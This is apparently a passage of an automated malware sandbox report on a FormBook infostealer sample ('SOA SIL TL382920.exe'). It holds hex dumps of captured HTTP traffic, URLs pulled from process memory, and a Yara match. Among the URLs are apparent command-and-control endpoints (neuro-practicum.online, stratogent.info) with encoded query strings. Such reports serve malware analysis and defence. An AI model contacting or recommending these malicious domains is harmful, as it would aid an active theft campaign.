20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dh2t/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:54:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 a2 ca 2f 5d 3f b0 9c 1b de 33 e1 df e6 6c 65 38 c6 8d e9 75 01 ba 69 cc df be 59 99 81 d1 99 2d 0d cf 37 03 bd fb ef bf 7e 3f 18 75 c3 bb 8e b1 32 f5 ee ad 65 de ad 5d 2f 00 fc ae 13 98 0e 94 ba b3 e6 c1 52 9f 9b b7 d6 cc 1c 90 1f 9c e5 58 81 65 d8 03 7f 66 d8 a6 2e 66 41 78 ee b5 1b f8 29 00 8e 6b 39 73 f3 23 94 0a ac c0 36 df fe f3 ff f8 9f ff db ff fc 5f ff f9 5f ff fc 7f ff f9 7f ff cf ff fd 9f ff d5 81 8b ff 71 ea 5c fb eb 29 5c fd d7 3f ff 9f 7f fe 5f ff fc 1f 78 f5 e6 8c 56 78 e3 07 f7 b6 d9 59 99 73 cb d0 bb 86 6d 77 df 9e 7d 73 f2 cd e7 fe 77 f2 cd 3f be ea 74 90 8e ce cc f7 3b fc 99 e3 ce cd ab 95 3b df d8 a6 7f 06 b7 06 b6 6b cc 4d ef 8c b0 8f ff cd 3f 3f 9f d9 ae 63 ce ff 0a 05 de 9b c1 40 e3 37 be 79 21 5e 9e e4 aa ae 41 08 52 d5 7d 6f 16 83 c8 17 85 7f 71 b9 b9 e5 07 67 b3 df 7c 5a ec da 5c 9d 5d db ee ec 83 cf 47 02 78 76 0d c2 77 13 7d f1 58 b7 83 74 00 15 ff 78 6e 66 b6 fe 3b fb 8a a7 74 3d 00 1f d6 b6 71 3f 59 d8 e6 c7 29 7e 0c e6 96 67 ce 02 cb 75 26 33 d7 de ac 9c 29 19 06 13 51 10 be 9e ae 2c 87 8e 8a 89 2c 09 eb 8f d3 a5 69 dd 2c 03 fa 6c 6d cc e7 30 1a 27 ea 70 fd b1 23 74 84 e9 ca f0 6e 2c 67 22 4c 01 8e eb 4d fe 45 d6 14 f8 7f ba 80 a1 32 11 25 28 f4 23 8c 19 8f fb d6 83 d1 c5 fd 60 da b7 66 60 cd 8c ce 4f e6 c6 4c 7e 72 df 7b a6 f9 de 70 7c ce 87 8f 01 0c 7e 6b 31 bd 36 66 1f 6e 3c 77 e3 cc 27 ff b2 58 2c a6 83 3b f3 fa 83 15 0c 02 63 3d 58 42 8b 6c 6c d5 80 a2 0d 3c a8 b7 36 3c 18 9d 5b d4 3a 13 c7 0d 7a 7c 4a d3 f4 3b 11 2f 5c d0 2b 0b db bd 1b 7c 9c 2c ad f9 dc 74 b6 7f 20 c3 b0 d3 4b e8 16 05 49 59 7f ec 3f a4 21 d4 00 d8 86 8f ae 50 f7 5d 41 33 3e 00 8b 1e 10 5c c2 ba db 65 b6 94 e9 79 ae 47 01 46 3c 15 76 34 fd 6a 65 3a 9b 01 16 c6 8e 83 e7 73 73 ce 35 af 32 30 66 58 26 42 3b 08 dc 35 a0 6e c6 84 32 b8 39 80 db 86 4d 10 51 d6 0e d0 8c 72 f2 76 49 45 a6 74 6a 04 8c c7 1a b4 6a 07 93 e1 89 b5 b8 1f 5c 7b ee 1d 88 ee d5 ad e5 5b d7 76 16 a6 aa 34 26 6e 47 9b 4a f9 c1 da 92 a4 73 dc 6b cb 36 07 91 4c 5f 51 89 e6 a2 c7 fe e6 1a 59 7c e5 ae 4d d0 d2 b1 e8 47 82 bf 83 2f 57 0b d7 85 c1 3f 98 bb 77 ce 4e 41 2d 6f c8 8e 5a 55 ed 0b 09 6f 2a 4e bb c0 35 16 cf 52 a2 4a e0 f2 56 d2 ed 91 b2 26 53 d5 b6 8c 97 0f a8 c2 27 22 e8 5f 63 13 b8 d3 7c af a4 80 65 ab 65 35 d2 d7 4d a9 c9 c0 2a a1 a1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:54:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 a2 ca 2f 5d 3f b0 9c 1b de 33 e1 df e6 6c 65 38 c6 8d e9 75 01 ba 69 cc df be 59 99 81 d1 99 2d 0d cf 37 03 bd fb ef bf 7e 3f 18 75 c3 bb 8e b1 32 f5 ee ad 65 de ad 5d 2f 00 fc ae 13 98 0e 94 ba b3 e6 c1 52 9f 9b b7 d6 cc 1c 90 1f 9c e5 58 81 65 d8 03 7f 66 d8 a6 2e 66 41 78 ee b5 1b f8 29 00 8e 6b 39 73 f3 23 94 0a ac c0 36 df fe f3 ff f8 9f ff db ff fc 5f ff f9 5f ff fc 7f ff f9 7f ff cf ff fd 9f ff d5 81 8b ff 71 ea 5c fb eb 29 5c fd d7 3f ff 9f 7f fe 5f ff fc 1f 78 f5 e6 8c 56 78 e3 07 f7 b6 d9 59 99 73 cb d0 bb 86 6d 77 df 9e 7d 73 f2 cd e7 fe 77 f2 cd 3f be ea 74 90 8e ce cc f7 3b fc 99 e3 ce cd ab 95 3b df d8 a6 7f 06 b7 06 b6 6b cc 4d ef 8c b0 8f ff cd 3f 3f 9f d9 ae 63 ce ff 0a 05 de 9b c1 40 e3 37 be 79 21 5e 9e e4 aa ae 41 08 52 d5 7d 6f 16 83 c8 17 85 7f 71 b9 b9 e5 07 67 b3 df 7c 5a ec da 5c 9d 5d db ee ec 83 cf 47 02 78 76 0d c2 77 13 7d f1 58 b7 83 74 00 15 ff 78 6e 66 b6 fe 3b fb 8a a7 74 3d 00 1f d6 b6 71 3f 59 d8 e6 c7 29 7e 0c e6 96 67 ce 02 cb 75 26 33 d7 de ac 9c 29 19 06 13 51 10 be 9e ae 2c 87 8e 8a 89 2c 09 eb 8f d3 a5 69 dd 2c 03 fa 6c 6d cc e7 30 1a 27 ea 70 fd b1 23 74 84 e9 ca f0 6e 2c 67 22 4c 01 8e eb 4d fe 45 d6 14 f8 7f ba 80 a1 32 11 25 28 f4 23 8c 19 8f fb d6 83 d1 c5 fd 60 da b7 66 60 cd 8c ce 4f e6 c6 4c 7e 72 df 7b a6 f9 de 70 7c ce 87 8f 01 0c 7e 6b 31 bd 36 66 1f 6e 3c 77 e3 cc 27 ff b2 58 2c a6 83 3b f3 fa 83 15 0c 02 63 3d 58 42 8b 6c 6c d5 80 a2 0d 3c a8 b7 36 3c 18 9d 5b d4 3a 13 c7 0d 7a 7c 4a d3 f4 3b 11 2f 5c d0 2b 0b db bd 1b 7c 9c 2c ad f9 dc 74 b6 7f 20 c3 b0 d3 4b e8 16 05 49 59 7f ec 3f a4 21 d4 00 d8 86 8f ae 50 f7 5d 41 33 3e 00 8b 1e 10 5c c2 ba db 65 b6 94 e9 79 ae 47 01 46 3c 15 76 34 fd 6a 65 3a 9b 01 16 c6 8e 83 e7 73 73 ce 35 af 32 30 66 58 26 42 3b 08 dc 35 a0 6e c6 84 32 b8 39 80 db 86 4d 10 51 d6 0e d0 8c 72 f2 76 49 45 a6 74 6a 04 8c c7 1a b4 6a 07 93 e1 89 b5 b8 1f 5c 7b ee 1d 88 ee d5 ad e5 5b d7 76 16 a6 aa 34 26 6e 47 9b 4a f9 c1 da 92 a4 73 dc 6b cb 36 07 91 4c 5f 51 89 e6 a2 c7 fe e6 1a 59 7c e5 ae 4d d0 d2 b1 e8 47 82 bf 83 2f 57 0b d7 85 c1 3f 98 bb 77 ce 4e 41 2d 6f c8 8e 5a 55 ed 0b 09 6f 2a 4e bb c0 35 16 cf 52 a2 4a e0 f2 56 d2 ed 91 b2 26 53 d5 b6 8c 97 0f a8 c2 27 22 e8 5f 63 13 b8 d3 7c af a4 80 65 ab 65 35 d2 d7 4d a9 c9 c0 2a a1 a1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:54:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 a2 ca 2f 5d 3f b0 9c 1b de 33 e1 df e6 6c 65 38 c6 8d e9 75 01 ba 69 cc df be 59 99 81 d1 99 2d 0d cf 37 03 bd fb ef bf 7e 3f 18 75 c3 bb 8e b1 32 f5 ee ad 65 de ad 5d 2f 00 fc ae 13 98 0e 94 ba b3 e6 c1 52 9f 9b b7 d6 cc 1c 90 1f 9c e5 58 81 65 d8 03 7f 66 d8 a6 2e 66 41 78 ee b5 1b f8 29 00 8e 6b 39 73 f3 23 94 0a ac c0 36 df fe f3 ff f8 9f ff db ff fc 5f ff f9 5f ff fc 7f ff f9 7f ff cf ff fd 9f ff d5 81 8b ff 71 ea 5c fb eb 29 5c fd d7 3f ff 9f 7f fe 5f ff fc 1f 78 f5 e6 8c 56 78 e3 07 f7 b6 d9 59 99 73 cb d0 bb 86 6d 77 df 9e 7d 73 f2 cd e7 fe 77 f2 cd 3f be ea 74 90 8e ce cc f7 3b fc 99 e3 ce cd ab 95 3b df d8 a6 7f 06 b7 06 b6 6b cc 4d ef 8c b0 8f ff cd 3f 3f 9f d9 ae 63 ce ff 0a 05 de 9b c1 40 e3 37 be 79 21 5e 9e e4 aa ae 41 08 52 d5 7d 6f 16 83 c8 17 85 7f 71 b9 b9 e5 07 67 b3 df 7c 5a ec da 5c 9d 5d db ee ec 83 cf 47 02 78 76 0d c2 77 13 7d f1 58 b7 83 74 00 15 ff 78 6e 66 b6 fe 3b fb 8a a7 74 3d 00 1f d6 b6 71 3f 59 d8 e6 c7 29 7e 0c e6 96 67 ce 02 cb 75 26 33 d7 de ac 9c 29 19 06 13 51 10 be 9e ae 2c 87 8e 8a 89 2c 09 eb 8f d3 a5 69 dd 2c 03 fa 6c 6d cc e7 30 1a 27 ea 70 fd b1 23 74 84 e9 ca f0 6e 2c 67 22 4c 01 8e eb 4d fe 45 d6 14 f8 7f ba 80 a1 32 11 25 28 f4 23 8c 19 8f fb d6 83 d1 c5 fd 60 da b7 66 60 cd 8c ce 4f e6 c6 4c 7e 72 df 7b a6 f9 de 70 7c ce 87 8f 01 0c 7e 6b 31 bd 36 66 1f 6e 3c 77 e3 cc 27 ff b2 58 2c a6 83 3b f3 fa 83 15 0c 02 63 3d 58 42 8b 6c 6c d5 80 a2 0d 3c a8 b7 36 3c 18 9d 5b d4 3a 13 c7 0d 7a 7c 4a d3 f4 3b 11 2f 5c d0 2b 0b db bd 1b 7c 9c 2c ad f9 dc 74 b6 7f 20 c3 b0 d3 4b e8 16 05 49 59 7f ec 3f a4 21 d4 00 d8 86 8f ae 50 f7 5d 41 33 3e 00 8b 1e 10 5c c2 ba db 65 b6 94 e9 79 ae 47 01 46 3c 15 76 34 fd 6a 65 3a 9b 01 16 c6 8e 83 e7 73 73 ce 35 af 32 30 66 58 26 42 3b 08 dc 35 a0 6e c6 84 32 b8 39 80 db 86 4d 10 51 d6 0e d0 8c 72 f2 76 49 45 a6 74 6a 04 8c c7 1a b4 6a 07 93 e1 89 b5 b8 1f 5c 7b ee 1d 88 ee d5 ad e5 5b d7 76 16 a6 aa 34 26 6e 47 9b 4a f9 c1 da 92 a4 73 dc 6b cb 36 07 91 4c 5f 51 89 e6 a2 c7 fe e6 1a 59 7c e5 ae 4d d0 d2 b1 e8 47 82 bf 83 2f 57 0b d7 85 c1 3f 98 bb 77 ce 4e 41 2d 6f c8 8e 5a 55 ed 0b 09 6f 2a 4e bb c0 35 16 cf 52 a2 4a e0 f2 56 d2 ed 91 b2 26 53 d5 b6 8c 97 0f a8 c2 27 22 e8 5f 63 13 b8 d3 7c af a4 80 65 ab 65 35 d2 d7 4d a9 c9 c0 2a a1 a1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:54:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 66 65 62 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 31 31 35 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 21 2a 5c 0a 20 20 21 2a 2a 2a 20 63 73 73 20 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 63 73 73 2d 6c 6f 61 64 65 72 2f 69 6e 64 65 78 2e 6a 73 3f 3f 63 6c 6f 6e 65 64 52 75 6c 65 53 65 74 2d 36 2e 75 73 65 5b 31 5d 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 70 6f 73 74 63 73 73 2d 6c 6f 61 64 65 72 2f 73 72 63 2f 69 6e 64 65 78 2e 6a 73 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 6c 65 73 73 2d 6c 6f 61 64 65 72 2f 64 69 73 74 2f 63 6a 73 2e 6a 73 21 2e 2f 62 65 6d 2f 62 6c 6f 63 6b 73 2e 61 64 61 70 74 69 76 65 2f 62 2d 70 61 67 65 2f 62 2d 70 61 67 65 2e 6c 65 73 73 20 2a 2a 2a 21 0a 20 20 5c 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 70 61 67 65 7b 64 69 73 70 6c 61 79 3a

Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/r1.crl0
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/r1.crt0
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: MBLUUsWuClSd.exe, 00000005.00000002.23442870422.000000000167D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.neuro-practicum.online
Source: MBLUUsWuClSd.exe, 00000005.00000002.23442870422.000000000167D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.neuro-practicum.online/dndz/
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000007.00000003.21525821135.0000024AE8B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: replace.exe, 00000004.00000003.21461468607.0000000007BF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd
Source: replace.exe, 00000004.00000002.23441797412.0000000002BE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: replace.exe, 00000004.00000002.23441797412.0000000002BE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.synd.fun&rand=
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: replace.exe, 00000004.00000002.23448017177.0000000004996000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.00000000047C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://stratogent.info/f3n5/?VzK4o8Jx=dhj1q08La8WFEWo3xk5bQlyPjuL1dgahmkpS3NRsd6Y/mAIsEkGjeuU1SXWIZ
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: replace.exe, 00000004.00000002.23448017177.00000000044E0000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.0000000004310000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://whois.gandi.net/en/results?search=redlakedispensery.net
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: replace.exe, 00000004.00000002.23450630136.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23448017177.00000000044E0000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.0000000004310000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.gandi.net/en/domain
Source: replace.exe, 00000004.00000002.23450630136.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, replace.exe, 00000004.00000002.23448017177.0000000004672000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.00000000044A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: replace.exe, 00000004.00000002.23450854090.0000000007C1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_server&
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_new&am
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_host&
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_cms&amp
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.synd.fun&utm_medium=parking&utm_campaig
Source: replace.exe, 00000004.00000002.23448017177.000000000434E000.00000004.10000000.00040000.00000000.sdmp, MBLUUsWuClSd.exe, 00000005.00000002.23446027884.000000000417E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.synd.fun&reg_source=parking_auto
Source: MBLUUsWuClSd.exe, 00000005.00000002.23446027884.0000000003B36000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.strato.de

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.SOA SIL TL382920.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SOA SIL TL382920.exe.400000.0.unpack, type: UNPACKEDPE
